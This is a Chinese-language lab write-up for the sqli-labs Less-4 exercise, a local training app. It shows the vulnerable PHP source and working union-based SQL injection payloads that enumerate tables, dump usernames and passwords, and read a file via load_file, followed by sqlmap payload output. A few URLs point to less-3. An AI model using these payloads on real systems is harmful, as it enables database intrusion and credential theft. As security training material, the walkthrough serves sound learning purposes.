sqli-lab-less4
一、靶标地址
Less-4 GET-Error Based- Double Quotes-string
#字符型带双引号基于报错的注入
http://127.0.0.1/sqli/less-4/
二、漏洞探测
http://127.0.0.1/sqli/less-4/?id=1'
#正常回显
http://127.0.0.1/sqli/Less-4/?id=1"
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
#单引号里面的是报错的语句 "1"") LIMIT 0,1
#通过报错猜测后面的语句为 where id=("$id") limit 0,1
http://127.0.0.1/sqli/less-3/?id=1
#正常回显
#select * from users where id=("1") limit 0,1;
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$id = '"' . $id . '"';//并置运算符 (.) 用于把两个字符串值连接起来。
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
四、黑盒与白盒测试
#白盒测试
$id = '"' . $id . '"';//并置运算符 (.) 用于把两个字符串值连接起来。
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
$id = "-1") --+"
$sql="SELECT * FROM users WHERE id=("-1") --+") LIMIT 0,1";
#无任何回显
#黑盒测试
#判断当期数据表的列数
$id="-1") order by 3 --+"
#当期用户名和数据库名
$id="-1") union select 1,user(),database() --+"
#查询表名
$id="-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+"
#information_schema是MySQL特有数据库,tables是其中的一个表名,table_name是其中一个列名,包含了所有数据表.table_schema是数据库名。
#查询列名
$id="-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+"
#查询具体列数据
$id="-1") union select 1,2,group_concat(username) from users --+"
$id="-1") union select 1,2,group_concat(password) from users --+"
#读取文件
$id="-1") union select 1,2,load_file("C:\\flag.txt") --+"
#show global variables like '%secure%';
#secure_file_priv为空才可以读取
五、脚本撰写
import requests
url="http://127.0.0.1/sqli/less-3/index.php?id=1"
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload=""
response=requests.get(url+payload,headers=header)
print(response.text)
六、sqlmap
sqlmap -u http://127.0.0.1/sqli/less-4/index.php?id=1
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1") AND 2082=2082#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1") AND (SELECT 6865 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(6865=6865,1))),0x7171767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("Eeda"="Eeda
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1") AND (SELECT 7060 FROM (SELECT(SLEEP(5)))bmLr) AND ("bQjf"="bQjf
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: id=-2956") UNION ALL SELECT NULL,NULL,CONCAT(0x716a716b71,0x4d616b4d424851416742774a464944735971475a4a654d6466566c4e6e435755655375714f53734e,0x7171767a71)#
七、总结
2、目前已有四种语句复合sql语法
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$sql="SELECT * FROM users WHERE id=("$id") LIMIT 0,1";